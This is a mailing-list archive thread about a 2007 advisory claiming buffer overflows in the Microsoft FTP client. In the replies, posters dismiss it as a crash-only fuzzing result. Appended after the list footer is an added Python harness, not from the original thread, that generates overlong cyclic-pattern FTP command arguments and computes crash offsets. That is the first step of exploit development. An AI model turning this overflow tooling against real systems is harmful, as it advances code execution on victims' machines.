Full Disclosure mailing list archives
Re: Microsoft FTP Client Multiple
From: "Daniel H. Renner" <dan () losangelescomputerhelp com>
Date: Wed, 28 Nov 2007 21:44:40 -0800
From what I've noticed, users of MS' FTP client aren't the usual Windows GUI user. So that would be one good social engineering trick...

Original Message:
------------------------------------------------
Date: Wed, 28 Nov 2007 18:34:47 -0500
From: "Peter Dawson" <slash.pd () gmail com>
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
To: "Stan Bubrouski" <stan.bubrouski () gmail com>
Cc: full-disclosure () lists grok org uk
Message-ID: <8f1f7b60711281534p554ccdb1mea0fd20826625658 () mail gmail com>
Content-Type: text/plain; charset="utf-8"

Yeah ..
a) "Social engineer victim to open it."
b) "Persuade victim to run the command"
is kind of funky..

On Nov 28, 2007 5:21 PM, Stan Bubrouski <stan.bubrouski () gmail com> wrote:

Not to mention the obvious fact that if you have to trick someone into running a batch file then you could probably just tell the genius to execute a special EXE you crafted for them.

-sb

On Nov 28, 2007 4:43 PM, dev code <devcode29 () hotmail com> wrote:

lolerowned, kinda like the 20 other non-exploitable stack overflow exceptions that someone else has been reporting on full disclosure

________________________________
Date: Wed, 28 Nov 2007 09:11:30 -0600
From: reepex () gmail com
To: rajesh.sethumadhavan () yahoo com; full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

so... what fuzzer that you didn't code did you use to find these amazing vulns? Also nice 'payload' in your exploits meaning 'nice long lists of "a"s'. You should not claim code execution when your code does not perform it. Well I guess it has been good talking until your fuzzer crashes another application and you copy and paste the results

On 11/28/07, Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com> wrote:

Microsoft FTP Client Multiple Bufferoverflow Vulnerability
#####################################################################
XDisclose Advisory : XD100096
Vulnerability Discovered : November 20th 2007
Advisory Reported : November 28th 2007
Credit : Rajesh Sethumadhavan
Class : Buffer Overflow, Denial Of Service
Solution Status : Unpatched
Vendor : Microsoft Corporation
Affected applications : Microsoft FTP Client
Affected Platform : Windows 2000 Server, Windows 2000 Professional, Windows XP (other versions may also be affected)
#####################################################################

Overview:
A buffer overflow vulnerability has been discovered in the Microsoft FTP client. Attackers can crash the FTP client of the victim user by tricking the user.

Description:
A remote attacker can craft a packet with a payload in the "mget", "ls", "dir", "username" and "password" commands as demonstrated below. When the victim executes the POC or specially crafted packets, the FTP client will crash, with possible arbitrary code execution in the context of the logged-in user. This vulnerability is hard to exploit since it requires social engineering and shellcode has to be injected as an argument to the vulnerable commands. The vulnerability is caused by an error in the Windows FTP client in validating commands like "mget", "dir", "user", "password" and "ls".

Exploitation method:

Method 1:
- Send POC with payload to user.
- Social engineer victim to open it.

Method 2:
- Attacker creates a directory with a long folder or file name on his FTP server (should be other than an IIS server).
- Persuade victim to run the command "mget", "ls" or "dir" on the specially crafted folder using the Microsoft FTP client.
- FTP client will crash and payload will get executed.

Proof Of Concept:
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Note: Modify the POC to connect to a lab FTP server (as of now it will connect to ftp://xdisclose.com).

Demonstration:
Note: The demonstration leads to crashing of the Microsoft FTP Client.
Download the POC, rename it to a .bat file and execute any one of the batch files:
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Solution:
No Solution

Screenshot:
http://www.xdisclose.com/images/msftpbof.jpg

Impact:
Successful exploitation may allow execution of arbitrary code with the privileges of the currently logged-in user. Impact of the vulnerability is system level.

Original Advisory:
http://www.xdisclose.com/advisory/XD100096.html

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability.

Disclaimer:
This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code/Proof Of Concept is to be used in a test environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
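The objection raised in the thread (a crash produced by a long run of "a"s says nothing about whether any of those bytes reach a register) is exactly the thing a tester would want to check before repeating the advisory's code-execution claim. The harness below is an added example for this archive page; it is not part of the original post and is not one of the XDisclose POC batch files. It builds the text of an ftp.exe "-s:" script (the real ftp.exe switch that runs commands from a file) that logs in to a lab server and issues one of the commands the advisory names with a non-repeating cyclic pattern as the argument, and it maps a register value read from the resulting crash back to an offset in that argument. The lab address 192.0.2.10, the anonymous credentials and the argument lengths are illustrative assumptions; the pattern scheme is an independent re-implementation of the common pattern_create/pattern_offset idea, not anything taken from the advisory.

```python
"""Cyclic-pattern test harness for the ftp.exe argument-length crashes
discussed in this thread.  Added example for this archive page; not part of
the original post and not one of the XDisclose POC batch files.  Host,
credentials and lengths are illustrative assumptions."""

import string
from itertools import product


def cyclic_pattern(length):
    """Return `length` characters of the upper/lower/digit triple pattern
    ("Aa0Aa1Aa2...").  Each aligned 3-character triple occurs exactly once
    in the first 26*26*10*3 = 20280 characters, so a 4-byte register value
    read from a crash dump maps to a single offset in practice."""
    chunks = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """Return the offset of a crash-time register value inside `pattern`,
    or -1 if the value is not part of the pattern, i.e. the register was
    not overwritten by argument bytes at all.  `value` is either the four
    ASCII characters seen in the dump or the register as a 32-bit integer,
    which is decoded little-endian the way an x86 register holds it."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little").decode("ascii", errors="replace")
    return pattern.find(value)


def build_ftp_script(command, host, length=4096,
                     user="anonymous", password="test@example.com"):
    """Build the text of an ftp.exe -s: script: open the lab server, answer
    the user name and password prompts, then issue `command` with a
    cyclic-pattern argument.  `command` is one of the commands the advisory
    names ("mget", "ls", "dir", "user"); for "user" the pattern becomes the
    user name, which exercises the username case.  The caller writes the
    result to a file and runs "ftp -s:script.txt" on the test machine."""
    if command not in ("mget", "ls", "dir", "user"):
        raise ValueError("command not covered by the advisory: %r" % command)
    arg = cyclic_pattern(length)
    lines = [
        "open " + host,   # ftp.exe then reads the user name and password lines
        user,
        password,
        command + " " + arg,
        "quit",
        "",
    ]
    return "\r\n".join(lines)


if __name__ == "__main__":
    # Lab address from the documentation range; not the advisory's server.
    script = build_ftp_script("mget", "192.0.2.10", length=2048)
    print(script[:120])
    # Suppose the crash shows EIP = 0x41306241: which argument bytes were those?
    print(pattern_offset(cyclic_pattern(2048), 0x41306241))
```

If pattern_offset returns -1 for every register in the dump, the crash is an unhandled length error rather than evidence of control, and the "possible arbitrary code execution" wording should stay unclaimed; a positive offset is the starting point for showing that an address placed there actually changes execution.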
Current thread:
- Re: Microsoft FTP Client Multiple Daniel H. Renner (Nov 28)
- Re: Microsoft FTP Client Multiple Valdis . Kletnieks (Nov 29)
- Re: Microsoft FTP Client Multiple Dude VanWinkle (Nov 29)
- Re: Microsoft FTP Client Multiple Daniel H. Renner (Nov 29)
- Re: Microsoft FTP Client Multiple Peter Besenbruch (Nov 29)
- Re: Microsoft FTP Client Multiple Dude VanWinkle (Nov 29)
- Re: Microsoft FTP Client Multiple Valdis . Kletnieks (Nov 29)